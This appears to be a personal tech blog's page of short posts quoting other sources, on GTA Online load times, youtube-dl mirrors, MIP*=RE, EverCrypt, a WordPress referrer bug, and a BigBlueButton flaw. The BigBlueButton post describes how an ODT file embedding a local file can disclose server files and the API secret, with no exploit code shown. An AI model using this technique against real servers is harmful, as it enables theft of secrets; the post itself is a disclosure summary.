GTA Online. Infamous for its slow loading times. Having picked up the game again to finish some of the newer heists I was shocked (/s) to discover that it still loads just as slow as the day it was released 7 years ago.

It was time. Time to get to the bottom of this.

First I wanted to check if someone had already solved this problem. Most of the results I found pointed towards anecdata about how the game is so sophisticated that it needs to load so long, stories on how the p2p network architecture is rubbish (not saying that it isn’t), some elaborate ways of loading into story mode and a solo session after that and a couple of mods that allowed skipping the startup R* logo video. Some more reading told me we could save a whopping 10-30 seconds with these combined!

Source: t0st

Rockstar, you had one simple job and you fucked up! This fix had cost about one hour of work, but you decided to release an unfinished game when the hardware available at that time wasn’t even capable of playing the game with maximum details. And now you wonder why people are mad at you. *facepalm*

2021-02-23 @ 10:47: Food for your brain Coding | Fun

Are you tired? Do you sit at home alone in your home office and are not motivated in any way to do your work? Do you feel how you’re getting stupid with every day you sit at home, watch TV and there’s no challenge at all? Well, you don’t have to anymore. Thanks to this scientific formula, formulated by scientists you’ll get what your brain wants.

Some days ago GitHub received a DMCA complain from the RIAA to remove youtube-dl due to copyright violations. The youtube-dl website is still online and I mirrored the files to my website just in case.

Now, due to a bug in GitHub – known for a long time – it’s possible to add files to other users’ repositories without modifying the checkout. You can’t change the current hash, but when adding files a new hash is created and you can link to that exact hash in order to get the files. Very neat!

So, long story short, that’s exactly what someone did.

BigBlueButton is a free web-based video conferencing software that lately got quite popular, largely due to Covid-19. Earlier this year I did a brief check on its security which led to an article on (German). I want to share the most significant findings here.

BigBlueButton has a feature that lets a presenter upload a presentation in a wide variety of file formats that gets then displayed in the web application. This looked like a huge attack surface. The conversion for many file formats is done with Libreoffice on the server. Looking for ways to exploit server-side Libreoffice rendering I found a blog post by Bret Buerhaus that discussed a number of ways of exploiting such setups.

One of the methods described there is a feature in Opendocument Text (ODT) files that allows embedding a file from an external URL in a text section. This can be a web URL like https or a file url and include a local file.

This directly worked in BigBlueButton. An ODT file that referenced a local file would display that local file. This allows displaying any file that the user running the BigBlueButton service could access on the server. A possible way to exploit this is to exfiltrate the configuration file that contains the API secret key, which then allows basically controlling the BigBlueButton instance. I have a video showing the exploit here.

Source: Hanno’s Blog

I never understood why you need to include external files or webpages in such a document and I can’t even think of a use-case why this is a great idea, unless you want to fuck up things.

Here’s the PoC, in case you’re interested.

My problem with contact tracing apps is that they have absolutely no value,” Bruce Schneier, a privacy expert and fellow at the Berkman Klein Center for Internet & Society at Harvard University, told BuzzFeed News. “I’m not even talking about the privacy concerns, I mean the efficacy. Does anybody think this will do something useful? … This is just something governments want to do for the hell of it. To me, it’s just techies doing techie things because they don’t know what else to do.

Source: Bruce Schneider on Security

You enter a cave. At the end of a dark corridor, you encounter a pair of sealed chambers. Inside each chamber is an all-knowing wizard. The prophecy says that with these oracles’ help, you can learn the answers to unanswerable problems. But there’s a catch: The oracles don’t always tell the truth. And though they cannot communicate with each other, their seemingly random responses to your questions are actually connected by the very fabric of the universe. To get the answer you seek, you must first devise… the questions.

Computer scientists are buzzing about a new mathematical proof that proposes a quantum-entangled system sort of like the one described above. It seems to disprove a 44-year-old conjecture and details a theoretical machine capable of solving the famous halting problem, which says a computer cannot determine whether it will ever be able to solve a problem it’s currently trying to solve.

The 150-page proof, titled simply “MIP*=RE,” deals in the esoteric subject of computational complexity. If it holds under scrutiny, it demonstrates a profound connection between quantum physics, computation, and mathematics. It shows that a theoretical class of computing devices—a verifier interrogating the quantum-entangled oracles—can check some of the most complex computer problems imaginable. And it has important implications for quantum physicists.

Source: Gizmodo

Real-time data and analytics and machine learning and AI creates unpreparedness by corporations and Big Tech companies.

Source: cyberscoop

That’s what the bot said, and he seems smarter than the people who use him.

2019-08-09 @ 08:11: Agile software development Coding

… means to fiddle around with something until it fits the use case. Documentation “will be done later” and structured programming “just happens by accident”.

EverCrypt—developed and verified by the Project Everest team—offers the same features, convenience, and performance as popular existing cryptographic libraries without the bugs that leave protocols and applications vulnerable. Usable by verified and unverified clients alike, EverCrypt emphasizes both multiplatform support and high performance. We accomplish this by producing both platform-agnostic C code and optimized assembly code for specific hardware targets through the combination of two components of Project Everest: the HACL* cryptographic library developed jointly between Inria and Microsoft Research and the Vale-Crypto library of assembly primitives developed collectively between Microsoft Research and Carnegie Mellon University.

By Jonathan Protzenko, Researcher; Bryan Parno, Associate Professor, Carnegie Mellon University

The verification process is likely more complex than the code itself. Anyway, this is one great step. Read the full article over at Microsoft.

2019-03-15 @ 10:52: Referrer hell Browsers | PHP | Security

Relying on the HTTP referrer is bad. Everyone knows this, but at least the WordPress developers seem to ignore the fact. Also I never understood, why PHP keeps writing HTTP_REFERER with a single “R” in the middle. The correct term would be HTTP_REFERRER.

Anyway, instead of storing the current URL in $_SESSION[‘HTTP_REFERRER’] as one would normally do, WordPress checks for $_SERVER[‘HTTP_REFERER’] instead.

The PHP documentation is very clear on this to not trust this referrer:

The address of the page (if any) which referred the user agent to the current page. This is set by the user agent. Not all user agents will set this, and some provide the ability to modify HTTP_REFERER as a feature. In short, it cannot really be trusted.

Imagine the following case: you run WordPress from a sub-folder of the root-directory and the referrer is – for whatever reason – set to the web-root of the server, rather than the web-root of your WordPress installation. In fact this is the case on my development machine; I talk about the reason somewhere below.

Now, when you try to delete/recycle a post/page/whatever WordPress checks the referrer in post.php in line 55:

$sendback = wp_get_referer();
if ( ! $sendback ||
	 strpos( $sendback, 'post.php' ) !== false ||
	 strpos( $sendback, 'post-new.php' ) !== false ) {
	if ( 'attachment' == $post_type ) {
		$sendback = admin_url( 'upload.php' );
	} else {
		$sendback = admin_url( 'edit.php' );
		if ( ! empty( $post_type ) ) {
			$sendback = add_query_arg( 'post_type', $post_type, $sendback );
} else {
	$sendback = remove_query_arg( array( 'trashed', 'untrashed', 'deleted', 'ids' ), $sendback );

For instance, the code above is taken from WordPress 5.1.1.

So, what happens when the referrer returned by wp_get_referer() contains the wrong URL? You’ll get redirected to anywhere, but the correct location. The only way to somehow fix this without messing with the code is to disable the referrer entirely. You still won’t get to the correct location, but at least you remain inside the WordPress web-root.

Why is the referrer wrong?

As stated above the referrer is set by the user agent (e.g. the browser). It seems like my Waterfox does not set the referrer correctly. For instance, it does not occur in Firefox and Opera. Looking at about:config in Waterfox I found the setting “network.http.referer.trimmingPolicy” being set to “2”. According to this page it will strip the referrer to its origin without any query strings etc.

Setting it back to its default solved the issue, but enables the browser to send the full referrer, which is not desirable by privacy means. On the other hand it did not break any other pages besides the WordPress backend, so I guess it’s time for the WordPress developers to fix their code.

  • About

    I never asked for this.

  • Got something interesting?

    You think you got something which should be on this site? Then contact me. You want something removed from this site, because you think it should not be here? Then go fuck yourself. This is a free website. Free as in freedom. It tolerates every opinion from everyone. However, it does not tolerate things which are illegal according to the Swiss legislation.

  • Disclaimer

    I cannot be held responsible for any kind of direct, indirect or consequential damages caused by the stuff and or opinions I provide here. Use this on your own risk. Don’t blame me if something goes wrong or totally messes up your machine, your life or whatever. If this is unacceptable for you then go away and never come back again. Thank you!